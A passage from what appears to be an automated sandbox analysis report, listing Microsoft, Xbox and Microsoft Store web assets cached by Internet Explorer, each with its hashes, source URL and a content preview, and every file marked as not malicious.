                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 64 64" style="enable-background:new 0 0 64 64;" xml:space="preserve">.<style type="text/css">...st0{fill:#0078D5;}.</style>.<g>..<path class="st0" d="M63.2,57.7c-0.4-1.4-1.1-2.8-2-4.2c-1-1.4-2.1-2.5-3.3-3.4c-0.6-0.5-1.4-1-2.4-1.5c0.2-0.2,0.5-0.4,0.7-0.7...c0.7-0.7,1.3-1.5,1.9-2.4c0.6-1.1,1-1.9,1.2-2.7c0.7-2.4,0.5-5-0.5-7.4c-1.2-2.7-3.3-4.8-6-6c-2.8-1.2-6-1.2-8.8,0...c-2.7,1.2-4.8,3.3-6,6c-1,2.5-1.1,5-0.5,7.4c0.2,1,0.7,1.9,1.2,2.8c0.4,0.7,1.1,1.5,1.9,2.4c0.3,0.3,0.5,0.5,0.7,0.7...c-0.7,0.3-1.2,0.7-1.9,1.2L39,50.3c-1.2,0.8-2.2,1.9-3.3,3.4c-1.9,2.7-2.8,5.7-2.8,9c0,0.6,0.4,1.1,1.1,1.1h2c0.1,0,0.3,0,0.4-0.1...h0.1h0.2l0.1-0.1c0.3-0.3,0.3-0.5,0.3-0.8c0-1.1,0.1-2.2,0.4-3c0.2-1,0.6-1.8,1.1-2.7c1-1.6,2.4-3,4-4c1.8-1,3.7-1.5,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\52-7ec320[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):169165
                                                                                                                                                                                                              Entropy (8bit):5.043574839315944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxh:jlZAjLkJeTC
                                                                                                                                                                                                              MD5:FC80EE0EE4C1195A0A3573C1F22E53A8
                                                                                                                                                                                                              SHA1:82AEF853A84BE4A2C3684E67ED83F577DF61557A
                                                                                                                                                                                                              SHA-256:1B61B75684F6AC70F426526277CC6730A26CA157B7632FF0EB6A2DC4D15D94C8
                                                                                                                                                                                                              SHA-512:C367661A89582A133F88D6E141BAF95AF4C3DA42ED27954B856DD52B1D2593A9ED8B1EFE4BC176F845F5BD2FCDF14CEEA172AF7F68ACB334ADA871CD99F2BAFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/16-3b4837/cf-7f2b14/7b-5ab060/b2-7c2f2c/af-85090f/b0-adecbe/42-6d7c67/52-7ec320?ver=2.0&amp;_cf=20210415
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\52-7ec320[2].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):308547
                                                                                                                                                                                                              Entropy (8bit):5.064718802483077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:iwzddg8HPbn/hL4fbv3DlF+ERyfJY6F0AJL55gGHjkzmEeTPNbaRgJ4J0ZRV8+uQ:LLkJeTZFyZgH
                                                                                                                                                                                                              MD5:E29B6219FBCD63E093A710F269FBF382
                                                                                                                                                                                                              SHA1:2A02A125B3FE3DAE130DC614DC40B190DE415AC8
                                                                                                                                                                                                              SHA-256:291F96292BB8F5B05A8046E83B2D3297FF0343D193A7D4A497778A6195766117
                                                                                                                                                                                                              SHA-512:A7E2940D5A8CCE2C1171D72F47D9F6A215A1FE44D5997CFA9C8C1BB1E94ADC9D9E3DF8BE1A3B55D5652E9EF1F2D811D9E69D364810B4E40C6EE720E78A894F69
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/MICROSOFT-365/_scrf/css/themes=default.device=uplevel_web/42-6d7c67/e7-e4b626/97-8c42a8/33-100b4f/c2-d2a230/2c-635258/4b-514590/81-8f5a7f/71-219a9b/59-e1e39a/30-5c72c0/6c-2dbc3f/bf-60f63e/50-55fec2/c0-379397/fd-9178b9/52-7ec320?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: @charset "UTF-8";.x-hidden-none-mobile-vp{display:none !important}@media screen and (-ms-high-contrast:active){.c-uhfh button,.c-uhfh .glyph-shopping-cart,.c-me .msame_Header{border:none !important}.c-logo{margin-right:1px;border:none !important;outline:none !important}.c-logo.c-cat-logo:focus>span:before,.c-logo.c-cat-logo:hover>span:before{background:WindowText}.c-uhf-nav-link{border:none !important}.c-uhf-nav-link:hover{text-decoration:underline !important}#search{background:Window;color:WindowText}#search span{vertical-align:top}.c-uhfh.c-sgl-stck .c-uhf-menu button:focus,.c-uhfh.c-sgl-stck .c-uhf-menu span:focus,.c-uhfh.c-sgl-stck .c-uhf-menu a:focus,.c-uhfh.c-sgl-stck .c-uhf-nav-link:focus,.c-uhfh.c-sgl-stck .c-logo.c-sgl-stk-uhfLogo:focus,.c-uhfh.c-sgl-stck .c-logo.c-cat-logo:focus,.c-uhfh.c-sgl-stck .c-search #search:focus,.c-uhfh.c-sgl-stck .glyph-shopping-cart:focus,.c-uhfh.c-sgl-stck .glyph-global-nav-button:focus,.c-uhfh.c-sgl-stck .glyph-shopping-bag:focus{outline:2px soli
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\52-7ec320[3].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):250468
                                                                                                                                                                                                              Entropy (8bit):5.094153490751728
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:iwzddg8HPbn/hL4fbv3DlF+ERyfJY6F0AJL55gGHjkzmEeTPNbaRgJ4J0ZRV8+uY:LLkJeT9FnJsK
                                                                                                                                                                                                              MD5:CE90C2C2CB6BA42D7BFA3AD3E9FE0079
                                                                                                                                                                                                              SHA1:A34C39CB1FBE6E4D003026CF73CCA30733D89B37
                                                                                                                                                                                                              SHA-256:19BE77BDD8CD6D585511A07B4EDB9532D6A0A29FA6BD3B5D722B4428642B2583
                                                                                                                                                                                                              SHA-512:795CA07DFB72052F4EE7F84BDDC9C440EF493F6EB94CDD17725F12046755EEB40D71A04D22E71B08C8E6408248801FB6F51CC0A8D872C64EF1985C28B70CDBCD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/microsoft-365/_scrf/css/themes=default.device=uplevel_web/42-6d7c67/88-d494a9/e7-e4b626/b5-285959/2c-635258/97-8c42a8/33-100b4f/a8-eb2884/87-c2d08b/b4-77b8bb/8c-33c91a/6a-f0f06f/84-ec5ba2/7b-b85c60/81-8f5a7f/43-edd42d/bf-60f63e/50-55fec2/c0-379397/fd-9178b9/52-7ec320?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: @charset "UTF-8";.x-hidden-none-mobile-vp{display:none !important}@media screen and (-ms-high-contrast:active){.c-uhfh button,.c-uhfh .glyph-shopping-cart,.c-me .msame_Header{border:none !important}.c-logo{margin-right:1px;border:none !important;outline:none !important}.c-logo.c-cat-logo:focus>span:before,.c-logo.c-cat-logo:hover>span:before{background:WindowText}.c-uhf-nav-link{border:none !important}.c-uhf-nav-link:hover{text-decoration:underline !important}#search{background:Window;color:WindowText}#search span{vertical-align:top}.c-uhfh.c-sgl-stck .c-uhf-menu button:focus,.c-uhfh.c-sgl-stck .c-uhf-menu span:focus,.c-uhfh.c-sgl-stck .c-uhf-menu a:focus,.c-uhfh.c-sgl-stck .c-uhf-nav-link:focus,.c-uhfh.c-sgl-stck .c-logo.c-sgl-stk-uhfLogo:focus,.c-uhfh.c-sgl-stck .c-logo.c-cat-logo:focus,.c-uhfh.c-sgl-stck .c-search #search:focus,.c-uhfh.c-sgl-stck .glyph-shopping-cart:focus,.c-uhfh.c-sgl-stck .glyph-global-nav-button:focus,.c-uhfh.c-sgl-stck .glyph-shopping-bag:focus{outline:2px soli
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\65-478888[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):104475
                                                                                                                                                                                                              Entropy (8bit):5.056098312647225
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:iwzddg8HPbn/hL4fbv3DlF+ERyfJY6F0AJL55gGHjkzmEeTPNbaRgJ4J0ZRV8+ux:LLkJeTU
                                                                                                                                                                                                              MD5:3752E1807344F339127900FB1AAD0590
                                                                                                                                                                                                              SHA1:85A5DC34F178091E800F0F1A5B784E92F6E945EC
                                                                                                                                                                                                              SHA-256:9450DE34502F97435E804836EC97BEC665CB1B48B018ED2AC47575A326ACCC00
                                                                                                                                                                                                              SHA-512:DFB7BA6757DA52E15095146901C2C519E26541E1539D2F6C1D36114A672CC6D8A3BC51FCEE6592243BD1FE617DDA1EFA344B6DF9021423B0BBA1ABD89716760C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-storeexp-neu-ms-com.akamaized.net/west-european/store/_scrf/css/themes=store-web-default.device=uplevel_web/83-ed236a/8a-137b49/e1-2bf54c/37-e29aca/54-3a8a5b/85-7eee32/19-be95b5/2d-5397d3/55-6d890a/bf-9c867f/65-478888?ver=2.0&_cf=02242021_3231
                                                                                                                                                                                                              Preview: @charset "UTF-8";.x-hidden-none-mobile-vp{display:none !important}@media screen and (-ms-high-contrast:active){.c-uhfh button,.c-uhfh .glyph-shopping-cart,.c-me .msame_Header{border:none !important}.c-logo{margin-right:1px;border:none !important;outline:none !important}.c-logo.c-cat-logo:focus>span:before,.c-logo.c-cat-logo:hover>span:before{background:WindowText}.c-uhf-nav-link{border:none !important}.c-uhf-nav-link:hover{text-decoration:underline !important}#search{background:Window;color:WindowText}#search span{vertical-align:top}.c-uhfh.c-sgl-stck .c-uhf-menu button:focus,.c-uhfh.c-sgl-stck .c-uhf-menu span:focus,.c-uhfh.c-sgl-stck .c-uhf-menu a:focus,.c-uhfh.c-sgl-stck .c-uhf-nav-link:focus,.c-uhfh.c-sgl-stck .c-logo.c-sgl-stk-uhfLogo:focus,.c-uhfh.c-sgl-stck .c-logo.c-cat-logo:focus,.c-uhfh.c-sgl-stck .c-search #search:focus,.c-uhfh.c-sgl-stck .glyph-shopping-cart:focus,.c-uhfh.c-sgl-stck .glyph-global-nav-button:focus,.c-uhfh.c-sgl-stck .glyph-shopping-bag:focus{outline:2px soli
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\816452fd-caba-42ca-aa85-019d20cfb92a[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1067x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):199541
                                                                                                                                                                                                              Entropy (8bit):7.972497728910669
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:+OjYKCB8WLVMN+F0htH/5GQkFO2R7hOq0gb77:bkdLKN+F0jH/5Zk42RIq0gbH
                                                                                                                                                                                                              MD5:B128B8838DE3711AC822D40068CB22C9
                                                                                                                                                                                                              SHA1:1AE1403DF90D26176F2C179DB6391BADAF1916F2
                                                                                                                                                                                                              SHA-256:9BEBEB89D125876C910825A32386F759BEFDF55FC4D078D6C5F79DB1B17B0B5B
                                                                                                                                                                                                              SHA-512:26EC3346CEC9E52E9818049FCFD7960DDE9D135395D1A51ECF5BD096BB11A4110D3E0C52E160F684F486EC0D946EA0AF6FA118E9C1658F832C5730DEBE31E1C7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/81/64/816452fd-caba-42ca-aa85-019d20cfb92a.jpg?n=XGP-2020_Small-tout-0_1067x600_02.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...........X.+......................................................................................`..........!.1A."Qa.2q..#B.....Rb....7r..$34CSTu......%'Ddt...........&()*5689:EFGHIJUVWXYZcefghijsvwxyz..........................................................................{........!1..A.Q."2aq..4..........#3BRb..C.........$%&'()*56789:DEFGHIJSTUVWXYZcdefghijrstuvwxyz..................................................................................?.jq....s.q.q.1....s.q.q.1....s.q..QK.C.r4........QM.X....Yj^,........U16.W.V.}q.g.<U...:..U.....wj.P._L......GF.|L...e.e.|T.C..2.....'rK....J...;WVCKN..0U@H.|z...-.@?.3.3.1!.b.o....}8Y...}^..x?..wGR.'.h...'.z......h?E...b......d.[.8g...3..R..5...Tl.u....<$...0.L.,0V.3....4......`..pKt...X.br..!...>H..'...V..1.3*..^.J.YG/...+cl.X.=Y...&...^.S....%.V. ...=$t.g5...oI..B..:..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8604b052-6f41-4123-aa20-b867f8bce263[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1904x805, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):128288
                                                                                                                                                                                                              Entropy (8bit):7.8531435486511265
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:XXN8nKc3stVmhfR+pCj6zN8jeI+F3ZHe9z7HDoyr:Xd8nvkmhfcprzN8Js3he9HEyr
                                                                                                                                                                                                              MD5:BA072F7F0732A86D41CE5B6992D43288
                                                                                                                                                                                                              SHA1:A443D3CCC98FA07D2C866DA4AD478690D12C2A9D
                                                                                                                                                                                                              SHA-256:0F33FCDD5E92E20F5DA93E27BF1B796F11EAA7C90F9746955430F42457B9FCC4
                                                                                                                                                                                                              SHA-512:7EBE69D6D1717CD1644B07FE0AEB2A60F7EA1C3DC7621A02F6416477E9CC63F98E54E96C7D1C3268B3E029FFB69A48D12266E5D8FCBCA977B7A33DD35EE190A6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/86/04/8604b052-6f41-4123-aa20-b867f8bce263.jpg?n=Dreamers_Home-Hero-1084_Family_1904x805.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...........%.p......................................................................................W.......!..1A.Qa."q..2....B....#R...Sb.....$3DT.....%&'()*456789:CEFGHIJUVW...XYZcdefghijrstuvwxyz.........................................................................................!.1AQa.."Bq..............#$%&'()*23456789:CDEFGHIJRSTUVWXYZbcdefghijrstuvwxyz............................................................................................?...ZA....T.T.z 4.a..a....:...0.0M...]........... ..-..R.(...@_R. %@.P. ).D.P.J....M....$A1.....UB..8.".l.C......B...T(m:(iC.R...#.....<.u.E<........R.b...0D.k-..{.:..Ti.0.<....n....^./.N.L..J.c.T......@..%.(4...Z..<RR.u.p..c.k.....H...`...f......#B......,C.*R....n.s...kf..=.\.u...c.:...$.M.I./.0..(h...F..n...=F.\;......b..W.U..........q.......E..&.=.'._I.+I..% .Z.hs;.=..e
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\91cf7289-df80-4e95-8e22-a13ce96ce934[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1083x1222, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):116084
                                                                                                                                                                                                              Entropy (8bit):7.849687250172216
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:SMHRYNun+LOfUD1o6bF0dEbAeVkCINPXoF0:1aNu+lm6pNbAeVxIPXo2
                                                                                                                                                                                                              MD5:E686BEE395F3A48C20C5C1A58C5450F5
                                                                                                                                                                                                              SHA1:43E217B70B19771F6DC1678976CD9431339034D4
                                                                                                                                                                                                              SHA-256:D76A3451C7554949C1BF305FE0D7BEAFC19FC6692FF5A55FBA8C3AC3DEAF6219
                                                                                                                                                                                                              SHA-512:9CDD3D1470E7C5B63ECEA5537970A99544EA5DD8383788716AAF388A6D64C6141671E97386CCDCEF5A1AF1F1701BCAF66417BBB65095D5275E47C7009E00297A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/91/cf/91cf7289-df80-4e95-8e22-a13ce96ce934.jpg?n=444793_Large-tout-0_1083x1222_04.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d.............;.....................................................................................!I.......!..1A.Qa."q..2...BR....#3Ub......Sr......$%CDTVc.......&'()*456789:EFGHIJWXYZds.....efghijtuvwxyz........................................................................o...........!1...AQa."2q..#BRb.....3...........$%&'()*..456789:CDEFGHIJSTUVWXYZcdefghijrstuvwxyz...................................................................................?..$....A!.bPH66@...#.Xr@Lj.0......D.hh.Q.f..H<...>........If'.l.....9 .ze..;..R.....A@..@..'..c.9...@..P .@D..D.cNH. ...tA)j$H.P"N.!......v..(........$..Q...o[...1.*....'0..z.L .Y<.........5@..D.......O. e.. .......9 .Y..D..2.....#M.8@.!.... a..... .A@...`...".T.x.J...b..=J..&Uy...S.. ..=BR.D..S-.m9 .a. .....R...0P..[.I.... ,H'... ..B~..... .&.A)..@.=.I..@.@...... X.. ......g
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\94-3cd1e0[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):68489
                                                                                                                                                                                                              Entropy (8bit):5.371151075731659
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:7tV81ICDVRgJhAiUinqgDRQ7wYv6uxhBANIu:7v81+einqgD8Q
                                                                                                                                                                                                              MD5:5D7F2F04176CC5D3CAE1BCDB15EED40C
                                                                                                                                                                                                              SHA1:86E9C4DF0796E3A8146B751D3BB168860F838A82
                                                                                                                                                                                                              SHA-256:BABE97146AADB62C442E7BE58A72479B4F1760F76D45B7027C8347F00964662A
                                                                                                                                                                                                              SHA-512:EA448E9DF2780A804F1FA86AD667C6CAD6D112F7448C84A0B86DC2917390014C2367B3E057DEEA112B8C99607985DE99CD9561193B389B3DE4F02D7C76331F08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://statics-storeexp-neu-ms-com.akamaized.net/store/_scrf/js/themes=store-web-default/e2-ed7413/94-3cd1e0?ver=2.0&_cf=02242021_3231
                                                                                                                                                                                                              Preview: var awa,behaviorKey;define("jsllConfig",["rawJsllConfig"],function(n){n.cookiesToCollect=["_mkto_trk"];var t=window._pageBITags.pageTags;return n.ix={a:t.userConsent||!1,g:t.userConsent||!1},n});awa=awa||{};awa.isInitialized=!1;awa.verbosityLevels={NONE:0,ERROR:1,WARNING:2,INFORMATION:3};awa.behavior={UNDEFINED:0,NAVIGATIONBACK:1,NAVIGATION:2,NAVIGATIONFORWARD:3,APPLY:4,REMOVE:5,SORT:6,EXPAND:7,REDUCE:8,CONTEXTMENU:9,TAB:10,COPY:11,EXPERIMENTATION:12,PRINT:13,SHOW:14,HIDE:15,MAXIMIZE:16,MINIMIZE:17,BACKBUTTON:18,STARTPROCESS:20,PROCESSCHECKPOINT:21,COMPLETEPROCESS:22,SCENARIOCANCEL:23,DOWNLOADCOMMIT:40,DOWNLOAD:41,SEARCHAUTOCOMPLETE:60,SEARCH:61,SEARCHINITIATE:62,TEXTBOXINPUT:63,PURCHASE:80,ADDTOCART:81,VIEWCART:82,ADDWISHLIST:83,FINDSTORE:84,CHECKOUT:85,REMOVEFROMCART:86,PURCHASECOMPLETE:87,VIEWCHECKOUTPAGE:88,VIEWCARTPAGE:89,VIEWPDP:90,UPDATEITEMQUANTITY:91,INTENTTOBUY:92,PUSHTOINSTALL:93,SIGNIN:100,SIGNOUT:101,SOCIALSHARE:120,SOCIALLIKE:121,SOCIALREPLY:122,CALL:123,EMAIL:124,COMMUNI
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\DevCMDL2.2.50[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 18316, version 0.0
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18316
                                                                                                                                                                                                              Entropy (8bit):7.9723714142137005
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:IEFSq9E2tE4pcKefQXGClbgiM0ARalFAEOMOh/wzguNUoO:jcQq4KKMILM0calOFM8T
                                                                                                                                                                                                              MD5:0CEDBB5E7888349E4705A66EDE3DD01C
                                                                                                                                                                                                              SHA1:BFF3C70DBD94C866BDEFC48E7BBA1D8F359577AC
                                                                                                                                                                                                              SHA-256:12D95D8D400EEAFA0258E9D29D6EA5EF0EC9CFC1410B75E47976FCB3F92082B0
                                                                                                                                                                                                              SHA-512:02738ACFAC17A4F51EEFF92F6FD001A4C874B077E3A31B079D9A3E84D551292A26A9D32EE2970C933ACC716A785C843EA7ABF51620C69251E7EE674A7EF28ACD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: wOFF......G.......~.........................OS/2...X...H...`JZ{.VDMX.............^.qcmap.......%...hT%..cvt ....... ...*....fpgm...........Y...gasp................glyf......8...cL...Ihead..?....6...6...rhhea..?........$....hmtx..@....|....'...loca..@............Jmaxp..A.... ... ....name..A....F........post..F........ .Q.wprep..G.........x...x.c`f..8.....u..1...4.f...$..........@ ..........._*8.|...V...)00......x...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x..]H.Q....Z[.....7........CE!.d!.."$-D**%....!2Z..6....0.0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LinkedIn-high-contrast[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 21 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):293
                                                                                                                                                                                                              Entropy (8bit):6.890428931870759
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPdznHi9ScEqKKtXZicsLkaXYP3Qzd/LBZCU9H8BoHvtup:6v/7VTsS1qK2Q7kaoP3QpT6qcG+
                                                                                                                                                                                                              MD5:3D16E95F5E48F0FC8133AC9B26379E59
                                                                                                                                                                                                              SHA1:D9BDE9AE2C6ECCB471A0B670BEA0E39E942B300F
                                                                                                                                                                                                              SHA-256:361B6014458B0BB0EECA24F4CBC59F4DD365E7A6813855EA159B7B596AF9C772
                                                                                                                                                                                                              SHA-512:D1BA60C18071B240A373AFC9D3B920A5E6EC640FD24531EAC40ED00116F41D6BDB6C4FA649B4BD616C17376880EE609403BD3F3522ADD952722A157141010F81
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/e9682e51/office.testdrive/images/social/LinkedIn-high-contrast.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.............bKv3....pHYs..........g......IDAT8.....0.@...q..@G`.G......A7a...7...).. ...K.i...;z "....kb....5.l...,;.....@.....2F..R...Wr.e..=.ux.I3`g..y7T.....x.v....H)>..LDso^vK.|@..."]z....5..).....'/....._.'f.m.%.....lR.t.. .C.2$.C1.t... ..H....JJ........IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\LinkedIn[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 19 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):315
                                                                                                                                                                                                              Entropy (8bit):7.022483950744116
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPg8i/kVR//rk94GudF86Z7pcZKNWxPPAS/1oeAGGi9QoP/dPnAfoQTp:6v/7xL/egrZtcYgP3//AzoZ2N9
                                                                                                                                                                                                              MD5:02734A460C03D20B8C4AEA1D9A7B7DCD
                                                                                                                                                                                                              SHA1:0A642B81EB3E0F66D2D4CDC49339C3A60845B427
                                                                                                                                                                                                              SHA-256:E495966DD87033EC1E3F55C58062DE559B251AAD1CABF20DD2AF44CD34675CD6
                                                                                                                                                                                                              SHA-512:1E4A8E8812BD061828D52B106AD91A03FB49B55A051DC0D433C731CE3F3A968A3C2BFF63B2FACDC8B220D37169FDB88EDAED6802667C6F0672B8941C05D8B958
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/30de2af0/office.testdrive/images/social/LinkedIn.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.............oU.t....sRGB.........gAMA......a.....IDAT8O..=j.A...Y-$.""........ ..Y..x..A...z.....[{O`B"B@..t.......[....L..*.j.........,].*.G..z..`...%^qS..!.w!.P.....gd.......$>1.?ts.......|.6..X.......=....J#.\.....+...w.r.&.Q@.C9.*...a`.j..Y......mw....c^.>.H.E.RG.>*..5....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\MemMDL2.3.61[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 138820, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):138820
                                                                                                                                                                                                              Entropy (8bit):7.997585394607156
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:3072:Rebzc+NJTfDpHweyl8w4/icyWp+wT2XwxDBXWB/lG:YzTjDmBdeB2gx4B9G
                                                                                                                                                                                                              MD5:E281F661640D81D30332EF75BEFC001C
                                                                                                                                                                                                              SHA1:369880CB2C0AFAD8B6D4D75CCFC1234C9628908A
                                                                                                                                                                                                              SHA-256:ED8637252D120D9B89BE660ADB8A70ACE29DDA03C0ABB3B351EE32B4F2AEA5DB
                                                                                                                                                                                                              SHA-512:FDC79264709114329F16F192BEB10D62752B18B58BE9EFAFE2452ED7146E4B4B27011F6935E1FD3A46D244C9C1B0B95CE47F563DBEEEF2F13267E41482FC4217
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socfonts/MemMDL2.3.61.woff
